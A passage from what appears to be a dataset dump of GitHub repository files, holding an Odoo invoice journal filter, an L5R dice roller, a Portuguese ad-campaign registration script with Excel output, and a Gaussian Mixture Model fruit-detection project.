"is_vendor": false,
"language": "Python",
"length_bytes": 1791,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 61,
"path": "/LocalizacionV13/ext_filtros_diarios_fact/model/models.py",
"repo_name": "izzihector/clientes",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nimport logging\nfrom datetime import datetime\nfrom odoo import api, fields, models, _\nfrom odoo.exceptions import UserError, ValidationError\n\n\n_logger = logging.getLogger('__name__')\n\nclass AccountMove(models.Model):\n _inherit = 'account.move' \n\n @api.depends('type')\n def _compute_invoice_filter_type_doc(self):\n\n ejecuta=\"no\"\n if self.type==\"in_invoice\":\n tipo_doc=\"fc\"\n typo=\"purchase\"\n ejecuta=\"si\"\n if self.type==\"in_refund\":\n tipo_doc=\"nc\"\n typo=\"purchase\"\n ejecuta=\"si\"\n if self.type==\"in_receipt\":\n tipo_doc=\"nb\"\n typo=\"purchase\"\n ejecuta=\"si\"\n\n if self.type==\"out_invoice\":\n tipo_doc=\"fc\"\n typo=\"sale\"\n ejecuta=\"si\"\n if self.type==\"out_refund\":\n tipo_doc=\"nc\"\n typo=\"sale\"\n ejecuta=\"si\"\n if self.type==\"out_receipt\":\n tipo_doc=\"nb\"\n typo=\"sale\"\n ejecuta=\"si\"\n \n if ejecuta==\"si\":\n busca_diarios = self.env['account.journal'].search([('tipo_doc','=',tipo_doc),('type','=',typo)])\n for det in busca_diarios:\n idd=det.id\n else:\n idd=1\n self.invoice_filter_type_doc= idd\n\n\n invoice_filter_type_doc = fields.Char(compute='_compute_invoice_filter_type_doc')\n\n journal_id = fields.Many2one('account.journal', string='Journal', required=True)\n #default=invoice_filter_type_doc\n\n \"\"\"journal_id = fields.Many2one('account.journal', string='Journal', required=True, readonly=True,\n states={'draft': [('readonly', False)]},\n domain=\"[('company_id', '=', company_id)]\",\n default=_get_default_journal)\"\"\""
}
] | 4 |
philippe-lemaire/l5r-5th-edition-dice-roller | https://github.com/philippe-lemaire/l5r-5th-edition-dice-roller | 04797ab0cd7c0beacfb777dd75d5bf721a0883db | b855798ecd28224df74064193204fe04ec07d2d4 | f25e6e9be37870802fe9053abbd76c7746af365b | refs/heads/main | 2023-03-14T16:35:14.526426 | 2021-04-05T12:22:51 | 2021-04-05T12:22:51 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7906976938247681,
"alphanum_fraction": 0.8081395626068115,
"avg_line_length": 33.400001525878906,
"blob_id": "84972d133eb839ba24a4a116a85427b502a4bc19",
"content_id": "6301fa051fcedcdb52d6e73034687216b5709b2f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 172,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 5,
"path": "/README.md",
"repo_name": "philippe-lemaire/l5r-5th-edition-dice-roller",
"src_encoding": "UTF-8",
"text": "# l5r-5th-edition-dice-roller\n\nJust a little beginner project implementing the Legend of the Five Rings 5th Edition dice rolling mechanics.\n\nLots of fun with dictionaries.\n"
},
{
"alpha_fraction": 0.5952956676483154,
"alphanum_fraction": 0.6049681305885315,
"avg_line_length": 34.26356506347656,
"blob_id": "40a1181d9a72cda78a8406e8e1b2ac61faa59735",
"content_id": "cc8863d5f6b01dc510dab68240ffcaa249c42703",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4549,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 129,
"path": "/dice-roller.py",
"repo_name": "philippe-lemaire/l5r-5th-edition-dice-roller",
"src_encoding": "UTF-8",
"text": "#!python3\n'''\nThis module contains a function to roll and keep dice\nfor the 5th edition of the Legends of the Five Rings (L5R) RPG.\n'''\nimport random\nimport pprint\nimport pyinputplus as pyip\n\npp = pprint.PrettyPrinter(indent=4)\n\n\ndef roll(ring, skill):\n '''takes in a ring value and a skill value, returns a tuple of successes,\n opportunities and strife gained.'''\n ringDice = {\n 1: [''],\n 2: ['Opportunity', 'Strife'],\n 3: ['Opportunity'],\n 4: ['Success', 'Strife'],\n 5: ['Success'],\n 6: ['Explosive Success', 'Strife'],\n }\n\n skillDice = {\n 1: [''],\n 2: [''],\n 3: ['Opportunity'],\n 4: ['Opportunity'],\n 5: ['Opportunity'],\n 6: ['Success', 'Strife'],\n 7: ['Success', 'Strife'],\n 8: ['Success'],\n 9: ['Success'],\n 10: ['Success', 'Opportunity'],\n 11: ['Explosive Success', 'Strife'],\n 12: ['Explosive Success', ''],\n }\n\n rawResult = {}\n\n for die in range(ring):\n face = random.randint(1, 6)\n rawResult['Ring die ' + str(die + 1)] = ringDice[face]\n\n for die in range(skill):\n face = random.randint(1, 12)\n rawResult['Skill die ' + str(die + 1)] = skillDice[face]\n\n pp.pprint(rawResult)\n print('')\n print(f\"You can keep up to {ring} dice from this roll.\\n\")\n\n # Now let's select the dice we want to keep.\n keptDice = {}\n\n for die in range(ring):\n choices = list(rawResult.keys())\n choice = pyip.inputMenu(choices + ['No more dice.'], lettered=True)\n if choice == 'No more dice.':\n break\n else:\n keptDice[choice] = rawResult[choice]\n del rawResult[choice]\n pp.pprint(rawResult)\n\n print(\"You kept:\\n\")\n pp.pprint(keptDice)\n # now let's make some dice explode\n # This needs to be recursive.\n # we will ask for each of those if the player wants to keep them or not.\n\n keptDiceToExplode = {key: value for key, value in keptDice.items() if 'Explosive' in value[0]}\n keptDiceNotToExplode = {key: value for (key, value) in keptDice.items() if 'Explosive' not in value[0]}\n explodedDice = {}\n\n # recursive explosion\n hasExplosionHappened = False\n while len(keptDiceToExplode):\n hasExplosionHappened = True\n print('\\n\\nYou have some dice to explode!\\n')\n # we'll populate our dict of exploded dice\n for k in keptDiceToExplode.keys():\n if 'Ring' in k:\n explodedDice['Extra die from ' + k] = ringDice[random.randint(1, 6)]\n print('You rolled', explodedDice['Extra die from ' + k])\n elif 'Skill' in k:\n explodedDice['Extra die from ' + k] = skillDice[random.randint(1, 12)]\n print('You rolled', explodedDice['Extra die from ' + k])\n\n # Now let's keep some exploded dice\n keptExplodedDice = {}\n for die in explodedDice.keys():\n choice = pyip.inputYesNo(prompt=f'Do you want to keep {explodedDice[die]}?\\n')\n if choice == 'yes':\n keptExplodedDice[die] = explodedDice[die]\n\n # now generate a new keptDiceThatHaveExploded dic from the values of keptDiceToExplode\n keptDiceThatHaveExploded = {}\n for k in keptDiceToExplode.keys():\n keptDiceThatHaveExploded[k] = [keptDiceToExplode[k][0].replace('Explosive ', ''), keptDiceToExplode[k][1]]\n\n # now let's reunite our kept dice\n keptDice = {}\n keptDice.update(keptDiceNotToExplode)\n keptDice.update(keptDiceThatHaveExploded)\n keptDice.update(keptExplodedDice)\n\n # let's regenerate our 3 temp dicts from above to check if we have new dice to explode\n keptDiceToExplode = {key: value for key, value in keptDice.items() if 'Explosive' in value[0]}\n keptDiceNotToExplode = {key: value for (key, value) in keptDice.items() if 'Explosive' not in value[0]}\n explodedDice = {}\n\n if hasExplosionHappened:\n print('\\nAfter all these explosions, you kept:\\n')\n pp.pprint(keptDice)\n\n print(\"\\nFinal result:\\n\")\n finalList = []\n for value in keptDice.values():\n finalList += value\n\n # Compute the total successes, opportunity and strife gained from roll\n successes = finalList.count('Success')\n opportunities = finalList.count('Opportunity')\n strife = finalList.count('Strife')\n\n print(f'You gained {successes} successes, {opportunities} opportunities, and {strife} strife.')\n return (successes, opportunities, strife)\n"
}
] | 2 |
lucasdev3/Projeto_Anuncio_Capgemini | https://github.com/lucasdev3/Projeto_Anuncio_Capgemini | bb12219bd51f2de1a787d5dd44f43667536e3509 | 469e3a3cb2c5ce01354dd7ef67b8c810413606dc | 4b5097194c54114c13e16a77450a9db1be40f2c2 | refs/heads/main | 2023-04-19T20:18:26.862330 | 2021-05-16T23:11:06 | 2021-05-16T23:11:06 | 368,002,304 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.4910486042499542,
"alphanum_fraction": 0.5447570085525513,
"avg_line_length": 19.552631378173828,
"blob_id": "f7a4f291b49dfa6f77d546a8e0f66a074352dd9b",
"content_id": "dcba48a3461b45408c109d67f53eaddaafee139a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 782,
"license_type": "permissive",
"max_line_length": 48,
"num_lines": 38,
"path": "/calculaDatas.py",
"repo_name": "lucasdev3/Projeto_Anuncio_Capgemini",
"src_encoding": "UTF-8",
"text": "from datetime import datetime\n\n\ndef getDifference(inicio, fim, interval=\"secs\"):\n\n\n\n duration = fim - inicio\n duration_in_s = duration.total_seconds()\n\n #Date and Time constants\n yr_ct = 365 * 24 * 60 * 60 # 31536000\n day_ct = 24 * 60 * 60 # 86400\n hour_ct = 60 * 60 # 3600\n minute_ct = 60\n\n def yrs():\n return divmod(duration_in_s, yr_ct)[0]\n\n def days():\n return divmod(duration_in_s, day_ct)[0]\n\n def hrs():\n return divmod(duration_in_s, hour_ct)[0]\n\n def mins():\n return divmod(duration_in_s, minute_ct)[0]\n\n def secs():\n return duration_in_s\n\n return {\n 'yrs': int(yrs()),\n 'days': int(days()),\n 'hrs': int(hrs()),\n 'mins': int(mins()),\n 'secs': int(secs())\n }[interval]\n\n"
},
{
"alpha_fraction": 0.5562015771865845,
"alphanum_fraction": 0.5738856792449951,
"avg_line_length": 35.37004470825195,
"blob_id": "263d267e0d3b09e70a11c7f6159c3e435574d468",
"content_id": "2fcccb69f3931db27fba6f20b13a6cdcf4ad49b4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8264,
"license_type": "permissive",
"max_line_length": 140,
"num_lines": 227,
"path": "/cadastro.py",
"repo_name": "lucasdev3/Projeto_Anuncio_Capgemini",
"src_encoding": "UTF-8",
"text": "from datetime import datetime\nfrom calculaDatas import getDifference\nfrom time import sleep\nimport os\nfrom openpyxl import *\n\n\nid = 1\nl = 2\ncont = 0\nbanco = {}\nbancoFiltroDataMaior = {}\nbancoFiltroDataMenor = {}\nbancoFiltroCliente = {}\n\n# ---------------- INICIANDO A TABELA EM EXCEL -----------------\nwb = load_workbook(filename='banco_de_dados.xlsx')\nsh = wb.worksheets[0]\n# ------------------------------CADASTRO------------------------\n\nwhile True:\n try:\n qnt = int(input('Quantos anuncios gostaria de cadastrar? '))\n print('\\n')\n break\n except ValueError as e:\n print('Digite apenas numeros inteiros...', e)\n\nwhile cont < qnt:\n gradeGeral = []\n gradeCadastro = []\n gradeRelatorio = []\n gradeFiltroDataMaior = []\n gradeFiltroDataMenor = []\n gradeCadastroMaiorSete = []\n gradeRelatorioMaiorSete = []\n gradeCadastroMenorSete = []\n gradeRelatorioMenorSete = []\n\n anuncio = input('Nome do anuncio: ').title().strip()\n sh[f'C{l}'] = anuncio\n gradeCadastro.append(anuncio)\n cliente = input('Nome do cliente: ').title().strip()\n sh[f'B{l}'] = cliente\n gradeCadastro.append(cliente)\n dataInicio = input('Data de inicio Exemplo [ 20-05-2000 ]: ').strip()\n sh[f'D{l}'] = dataInicio\n gradeCadastro.append(dataInicio)\n dataTermino = input('Data de término Exemplo [ 20-05-2000 ]: ').strip()\n sh[f'E{l}'] = dataTermino\n gradeCadastro.append(dataTermino)\n while True:\n try:\n investimentoDia = int(input('Investimento diário: R$ '))\n sh[f'F{l}'] = investimentoDia\n gradeCadastro.append(investimentoDia)\n break\n except ValueError as e:\n print('Digite somente numeros inteiros...', e)\n # ------------------------ CRIAÇÃO DA GRADE DE RELATORIO -----------------\n # ----------------------------CALCULO DE RELATORIO -----------------------\n\n a1 = int(dataInicio[6:12])\n m1 = int(dataInicio[3:5])\n d1 = int(dataInicio[0:2])\n\n a2 = int(dataTermino[6:12])\n m2 = int(dataTermino[3:5])\n d2 = int(dataTermino[0:2])\n\n inicio = datetime(a1, m1, d1) # yr, mo, day, hr, min, sec\n fim = datetime(a2, m2, d2)\n\n viewsInit = 30 * investimentoDia\n cliques = viewsInit * 0.12\n sh[f'I{l}'] = cliques\n compartilhamentos = (0.15 * cliques) * 4\n sh[f'J{l}'] = compartilhamentos\n newViews = int(compartilhamentos * 40)\n totalViews = int(viewsInit + newViews)\n sh[f'H{l}'] = totalViews\n investimentoTotal = investimentoDia * (getDifference(inicio, fim, 'days'))\n sh[f'G{l}'] = investimentoTotal\n gradeRelatorio.append(investimentoTotal)\n gradeRelatorio.append(totalViews)\n gradeRelatorio.append(cliques)\n gradeRelatorio.append(compartilhamentos)\n\n gradeRelatorioMenorSete = gradeRelatorio\n gradeCadastroMenorSete = gradeCadastro\n gradeRelatorioMaiorSete = gradeRelatorio\n gradeCadastroMaiorSete = gradeCadastro\n\n # ----------------------FILTRAR POR DATA COLOCANDO AS INFORMAÇÕES EM LISTAS DIFERENTES --------------------\n\n # ANUNCIOS COM MAIS DE 7 DIAS\n if getDifference(inicio, fim, 'days') > 7:\n gradeFiltroDataMaior.append(gradeCadastroMaiorSete)\n gradeFiltroDataMaior.append(gradeRelatorioMaiorSete)\n # ANUNCIOS COM MENOS DE 7 DIAS\n else:\n gradeFiltroDataMenor.append(gradeCadastroMenorSete)\n gradeFiltroDataMenor.append(gradeRelatorioMaiorSete)\n bancoFiltroDataMaior[id] = gradeFiltroDataMaior\n bancoFiltroDataMenor[id] = gradeFiltroDataMenor\n # RETIRANDO CHAVES COM LISTAS VAZIAS\n while bancoFiltroDataMenor[id] == []:\n bancoFiltroDataMenor.pop(id)\n break\n while bancoFiltroDataMaior[id] == []:\n bancoFiltroDataMaior.pop(id)\n break\n\n # ----------------- CADASTROS E RELATORIOS GERAIS ----------------------------------\n\n gradeGeral.append(gradeCadastro)\n gradeGeral.append(gradeRelatorio)\n\n banco[id] = gradeGeral\n\n # ------------------------ FILTRO DE CLIENTES ---------------------------\n\n bancoFiltroCliente[cliente] = gradeGeral\n\n # -------------------------------------------------------------------------\n\n id += 1\n cont += 1\n l += 1\n print('\\n')\n# ------------------------IMPRESSÃO DE DADOS NA TELA PARA O USUÁRIO MOSTRANDO OS ANUNCIOS E SEUS RELATORIOS----------\n\ntitulo2 = 'GERANDO RELATORIO'\nprint('-' * len(titulo2))\nprint(titulo2)\nprint('-' * len(titulo2))\nsleep(4)\n# ----------------------------- RELATORIO GERAL ------------------------------------\nfor i, j in banco.items():\n cadastro = banco[i][0]\n relatorio = banco[i][1]\n print('\\n')\n print(\n 'ID Anuncio: {} | Cliente: {} | Anuncio: {} | Data de Inicio: {} | Data de Termino: {} | Investimento Inicial: R${:.2f}'.format(\n i, cadastro[1], cadastro[0], cadastro[2], cadastro[3], float(cadastro[4])))\n print('\\n')\n print(\n 'Investimento Total: R${:.2f} | Vizualizacoes Max.: {} | Cliques Max.: {} | Compartilhamentos Max.: {}'.format(\n float(relatorio[0]), relatorio[1], relatorio[2], int(relatorio[3])))\n print('\\n')\n\nprint('\\n')\n# ------------------ RELATORIO POR TEMPO --------------------------------\nfiltroData = input('Gostaria de filtrar os anuncios por data?[S / N]: ').strip().lower()\n# --------------------MAIS DE 7 DIAS ---------------------\nif filtroData == 's':\n titulo3 = 'FILTRANDO ANUNCIOS COM MAIS DE 7 DIAS '\n print('-' * len(titulo3))\n print(titulo3)\n print('-' * len(titulo3))\n sleep(4)\n for i, j in bancoFiltroDataMaior.items():\n cadastro = bancoFiltroDataMaior[i][0]\n relatorio = bancoFiltroDataMaior[i][1]\n print('\\n')\n print(\n 'ID Anuncio: {} | Cliente: {} | Anuncio: {} | Data de Inicio: {} | Data de Termino: {} | Investimento Inicial: R${:.2f}'.format(\n i, cadastro[1], cadastro[0], cadastro[2], cadastro[3], float(cadastro[4])))\n print('\\n')\n print(\n 'Investimento Total: R${:.2f} | Vizualizacoes Max.: {} | Cliques Max.: {} | Compartilhamentos Max.: {}'.format(\n float(relatorio[0]), relatorio[1], int(relatorio[2]), int(relatorio[3])))\n print('\\n')\n\n print('\\n')\n\n titulo4 = 'FILTRANDO ANUNCIOS COM MENOS DE 7 DIAS '\n print('-' * len(titulo4))\n print(titulo4)\n print('-' * len(titulo4))\n sleep(4)\n # --------------------- MENOS DE 7 DIAS ---------------------\n for i, j in bancoFiltroDataMenor.items():\n cadastro = bancoFiltroDataMenor[i][0]\n relatorio = bancoFiltroDataMenor[i][1]\n print('\\n')\n print(\n 'ID Anuncio: {} | Cliente: {} | Anuncio: {} | Data de Inicio: {} | Data de Termino: {} | Investimento Inicial: R${:.2f}'.format(\n i, cadastro[1], cadastro[0], cadastro[2], cadastro[3], float(cadastro[4])))\n print('\\n')\n print(\n 'Investimento Total: R${:.2f} | Vizualizacoes Max.: {} | Cliques Max.: {} | Compartilhamentos Max.: {}'.format(\n float(relatorio[0]), relatorio[1], int(relatorio[2]), int(relatorio[3])))\n print('\\n')\nfiltroCliente = input('Gostaria de filtrar os anuncios por Cliente? [S / N]: ').lower().strip()\nprint(\"\\n\")\n# --------------- ORDENAR OS ANUNCIOS EM ORDEM ALFABETICA COMO BASE O NOME DOS CLIENTES --------------------\ntitulo5 = 'LISTANDO CLIENTES EM ORDEM ALFABETICA'\nprint('-' * len(titulo5))\nprint(titulo5)\nprint('-' * len(titulo5))\nsleep(4)\nif filtroCliente == 's':\n for i in sorted(bancoFiltroCliente, key=bancoFiltroCliente.get(1)):\n a = bancoFiltroCliente[i][0]\n b = bancoFiltroCliente[i][1]\n print('\\n')\n print(\n 'Cliente: {} | Anuncio: {} | Data de Inicio: {} | Data de Termino: {} | Investimento Inicial: R${:.2f}'.format(\n a[1], a[0], a[2], a[3], a[4]))\n print('\\n')\n print('Investimento Total: R${} | Vizualizacoes Max.: {} | Cliques Max.: {} | Compartilhamentos Max.: {}'.format(\n b[0], b[1], b[2], int(b[3])))\n print('\\n')\n\nprint('\\n')\nwb.save(f\"banco_de_dados.xlsx\")\naviso1 = 'Salvando relatorio geral em uma Planilha Excel'\naviso2 = 'Acesse a pasta do programa para abrir'\nprint('-' * len(aviso1))\nprint(aviso1)\nprint(aviso2)\nprint('-' * len(aviso1))\nsleep(4)\n\n\nos.system(\"pause\")\n"
},
{
"alpha_fraction": 0.6646825671195984,
"alphanum_fraction": 0.6884920597076416,
"avg_line_length": 32.66666793823242,
"blob_id": "63b2258057295e310dd9d78c167c53f3ad04fa38",
"content_id": "4c281ec63e44e9eb865bb7454efafa53e83d66f4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 506,
"license_type": "permissive",
"max_line_length": 112,
"num_lines": 15,
"path": "/Calculadora.py",
"repo_name": "lucasdev3/Projeto_Anuncio_Capgemini",
"src_encoding": "UTF-8",
"text": "import os\nwhile True:\n try:\n investimento_dia = int(input(\"Valor a ser investido: R$\"))\n break\n except ValueError:\n print('Digite somente valores inteiros...')\nviews_init = 30 * investimento_dia\ncliques = 0.12 * views_init\ncompartilhamentos_max = (cliques * 0.15) * 4\nnew_views = int(compartilhamentos_max * 40)\ntotal_views = new_views + views_init\n\nprint(\"Valor Investido: R${:.2f} | Projeção de Alcance: {} visualizacoes\".format(investimento_dia, total_views))\nprint(cliques)"
},
{
"alpha_fraction": 0.7614138722419739,
"alphanum_fraction": 0.76877760887146,
"avg_line_length": 44.266666412353516,
"blob_id": "51db9260bc8056ec435de689206be0e2a152cdf6",
"content_id": "9ee0f8a777ee795e63901b67a42669074f398151",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 689,
"license_type": "permissive",
"max_line_length": 131,
"num_lines": 15,
"path": "/README.md",
"repo_name": "lucasdev3/Projeto_Anuncio_Capgemini",
"src_encoding": "UTF-8",
"text": "# Projeto_Anuncio_Capgemini\n Projeto_Cadastro_De_Anuncios\n Programas utilizados:\n- IDE Utilizada -> PyCharm - Community\n- Excel\n\n#Instruções de Uso\n\n1. -> Abrir a pasta \"Projeto_Anuncio_Capgemini\"\n2. -> Abrir o arquivo \"cadastro.py\"\n3. -> Para compilar o arquivo, basta clicar no arquivo pelo PyCharm com o botão direito e clicar em \"Run\" ou compilar via terminal.\n4. -> O programa irá alocar os registros dos anuncios na planilha Excel \"banco_de_dados.xlsx\".\n5. -> Para consultar os anuncios inseridos basta abrir o arquivo Excel que estará na mesma pasta.\n\nOBS: Sou iniciante na área da tecnologia da informação, Python foi o meu primeiro contato com Linguagem de Programação.\n"
}
] | 4 |
tpeaton/rosalind | https://github.com/tpeaton/rosalind | 11303be1c74ec564efdd01322e12de8dd229241c | fd16163553f4a3bb1bb1f507b65995c2b3ae3f3e | c94dd15850a367bd372ffb92226d0e4456864274 | refs/heads/master | 2016-03-30T23:34:53.840803 | 2013-09-12T22:01:05 | 2013-09-12T22:01:05 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7272727489471436,
"alphanum_fraction": 0.7272727489471436,
"avg_line_length": 17.5,
"blob_id": "c67ad44b5d9d8873a5fe5f49995394db34a56868",
"content_id": "8306fdec1290a5a949a9076ca5398601e2b2a1fb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 110,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 6,
"path": "/RNA.py",
"repo_name": "tpeaton/rosalind",
"src_encoding": "UTF-8",
"text": "sample = 'GATGGAACTTGACTACGTAAATT'\n\ndef DNAtoRNA(dna):\n return dna.replace('T','U')\n\nprint DNAtoRNA(sample)"
},
{
"alpha_fraction": 0.6024096608161926,
"alphanum_fraction": 0.6024096608161926,
"avg_line_length": 21.727272033691406,
"blob_id": "deb15745631c9917fe57114430849aefbcd0bbdb",
"content_id": "92a74b12b9a4c121bb82329b81cd49ba597edc9d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 249,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 11,
"path": "/REVC.py",
"repo_name": "tpeaton/rosalind",
"src_encoding": "UTF-8",
"text": "sampleDNA = 'AAAACCCGGT'\n\ndef DNARevCompliment(dna):\n DNAComp = {'A': 'T', 'T': 'A', 'C': 'G', 'G': 'C'}\n reverseComp = ''\n for x in reversed(dna):\n reverseComp += DNAComp[x]\n\n return reverseComp\n\nprint DNARevCompliment(sampleDNA)"
},
{
"alpha_fraction": 0.45895522832870483,
"alphanum_fraction": 0.4738805890083313,
"avg_line_length": 25.850000381469727,
"blob_id": "e21151b51acefad54b30c9f610acd6b9b4285388",
"content_id": "1792f53e665d96b0af6d59ac10400f991296e99b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 536,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 20,
"path": "/DNA.py",
"repo_name": "tpeaton/rosalind",
"src_encoding": "UTF-8",
"text": "sample = 'AGCTTTTCATTCTGACTGCAACGGGCAATATGTCTCTGTGTGGATTAAAAAAAGAGTGTCTGATAGCAGC'\n\n\ndef countNucleotides(strand):\n counts = {'A': 0, 'C': 0, 'G': 0, 'T': 0}\n\n for x in strand:\n if x == 'A':\n counts['A'] += 1\n elif x == 'C':\n counts['C'] += 1\n elif x == 'G':\n counts['G'] += 1\n elif x == 'T':\n counts['T'] += 1\n\n return str(counts['A']) + ' ' + str(counts['C']) + ' ' + str(counts['G']) \\\n + ' ' + str(counts['T'])\n\nprint countNucleotides(sample)"
}
] | 3 |
clary045/GMM | https://github.com/clary045/GMM | fd6e30c653f568b22e1416cb53f0864cb0736c4a | 97a7f2d391ce5570975ae11e23286549bbd5d032 | eb77d3cd0cc9650153fd908fd5a5dac315537396 | refs/heads/main | 2023-02-09T19:39:20.863260 | 2021-01-04T08:32:22 | 2021-01-04T08:32:22 | 312,143,041 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7704917788505554,
"alphanum_fraction": 0.7885245680809021,
"avg_line_length": 29.5,
"blob_id": "e31cf99ac2987755443cf7681c38b1b57c03a1e8",
"content_id": "13b5435c858d3f812a2ef07608a6855fe86ba13d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 616,
"license_type": "no_license",
"max_line_length": 127,
"num_lines": 20,
"path": "/README.md",
"repo_name": "clary045/GMM",
"src_encoding": "UTF-8",
"text": "This project is using Gaussian Mixture Model to detect orange and apple and sorting them to their respective boxes.\nIt contains the following python file.\n1. Data collection using Matlab\n2. detect Orange function \n3. detect apple function\n4. Implementation in real time\n\nRequirements:\n\nThe GMM algorithm uses the following python package:\n1. numpy\n2. pandas\n3. scipy\n4. Open cv\n5. For dataset you can create your own. The minimum should be atleast 50 image for each class (orange class 🍊 and apple class🍎.\n\nContacts:\n\nFor reporting bugs or help regarding any aspect of the GMM algorithm, please email:\[email protected]\n"
},
{
"alpha_fraction": 0.3829154372215271,
"alphanum_fraction": 0.4521887004375458,
"avg_line_length": 38.568965911865234,
"blob_id": "cb92cbc147d37fe0153b0791f18ac13f75c9d4a0",
"content_id": "dc1d89e40946520eccff80a2c1138fc98d93ed0f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2353,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 58,
"path": "/detectOrangeFunc.py",
"repo_name": "clary045/GMM",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Jul 29 23:29:39 2020\r\n######################################################################\r\n# Development Of an Embedded Vision Based Fruit Sorting Machine #####\r\n@author: CLARY NORMAN (2017141960) ####\r\n\"\"\" #####\r\n####################################################################\r\nimport numpy as np\r\nimport cv2 \r\n\r\ndef detectOrange(I):\r\n # load or hard code your parameters here\r\n mu = np.array([200.224,123.543,32.4314])\r\n #m1 = mu.reshape(1,3)\r\n sigma = np.array([[746.829,613.434,114.998],[613.434,724.818,380.201],[114.998,380.201,698.326]])\r\n threshold = 2.04108e-07\r\n D = 3\r\n ########################################################################################################################\r\n # find the ball color pixel using your model\r\n ########################################################################################################################\r\n #output1 = cv2.resize(I, (400,400))\r\n im_rgb1 = cv2.cvtColor(I, cv2.COLOR_BGR2RGB)\r\n im_rgb = cv2.cvtColor(I, cv2.COLOR_BGR2HSV)\r\n# cv2.imshow('Origial Orange fruit',output)\r\n\r\n\r\n R = im_rgb1[:,:,0]\r\n G = im_rgb1[:,:,1]\r\n B = im_rgb1[:,:,2]\r\n\r\n S = np.zeros([50,50])\r\n\r\n for m in range(50):\r\n for n in range (50):\r\n r = R[m,n]\r\n g = G[m,n]\r\n b = B[m,n]\r\n x = np.double([r,g ,b])\r\n SIGMA_inv = np.linalg.inv(sigma)\r\n denominator = np.sqrt((2 * np.pi)**D * np.linalg.det(sigma))\r\n exponent = -(1/2) * ((x - mu).T @ SIGMA_inv @ (x - mu ))\r\n p = float((1. / denominator) * np.exp(exponent) ) \r\n if (p > threshold):\r\n S[m,n] = True\r\n\r\n # Calculating the pixel of the Orange fruit \r\n pixels = cv2.countNonZero(S) \r\n image_area = im_rgb1.shape[0] * im_rgb1.shape[1]\r\n area_ratio1 = (pixels / image_area) * 100 \r\n # apply morphological method to fill the holes\r\n kernel = np.ones((5,5),np.uint8)\r\n dilation = cv2.dilate(S,kernel,iterations = 1)\r\n closing = cv2.morphologyEx(dilation, cv2.MORPH_CLOSE, kernel) \r\n # covert binary image to its original image without the background\r\n mask = np.atleast_3d(closing)\r\n red1 = np.uint8(mask)*I\r\n return red1,area_ratio1,S,I\r\n"
},
{
"alpha_fraction": 0.5171743631362915,
"alphanum_fraction": 0.5482825636863708,
"avg_line_length": 31.0625,
"blob_id": "a1658398dda6b239f272fc49c5b29f976f5702ec",
"content_id": "a89ef00fe2f8a79165a3333590598360f1aa9ec0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1543,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 48,
"path": "/DataCollection.py",
"repo_name": "clary045/GMM",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 24 14:36:45 2020\n######################################################################\n# Development Of an Embedded Vision Based Fruit Sorting Machine #####\n@author: CLARY NORMAN (2017141960) ####\n\"\"\" #####\n####################################################################\n# Code for training the model\nfrom mpl_toolkits import mplot3d \nimport numpy as np \nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy\n\n# calculating the mean and standard deviation \ndf = pd.read_csv (r'C:\\Users\\CLARY NORMAN\\Documents\\2020\\2nd semester\\Capstone 2\\Fruit sorting\\samples\\apple\\Apple_data_training')\n#reading dataset \nr = df.iloc[:,0]\ng = df.iloc[:,1]\nb = df.iloc[:,2]\n\n# Creating figure \nfig = plt.figure(figsize = (10, 7)) \nax = plt.axes(projection =\"3d\") \n# Creating plot \nax.scatter3D(r, g,b,color =\"red\"); \nplt.title(\"pixel color distribution\") \nplt.xlabel(\"Red\")\nplt.ylabel(\"Green\");\n#plt.zlabel(\"Blue\");\nplt.show()\n#choose model type and estimate the parameters (mu and Sigma) from the sample data.\nD = 3\nX = np.double(df)\nmu = numpy.mean(X,axis = 0)\ns = df.shape\nsigma = np.cov(df,rowvar = 0)\np = np.zeros(s[0])\n\nfor n in range(0,s[0]): \n B = X[n,:]\n SIGMA_inv = np.linalg.inv(sigma)\n denominator = np.sqrt((2 * np.pi)**D * np.linalg.det(sigma))\n exponent = -(1/2) * ((B - mu).T @ SIGMA_inv @ (B - mu ))\n p[n] = float((1. / denominator) * np.exp(exponent) ) \n \n print (p[n])\n "
},
{
"alpha_fraction": 0.40963855385780334,
"alphanum_fraction": 0.4403931498527527,
"avg_line_length": 34.69767379760742,
"blob_id": "ee38ce334eb8cf0a759d2e1d3fb4bc36671083af",
"content_id": "78bf7642bbde4f2e29f62c0d76ffa4972e1d460c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
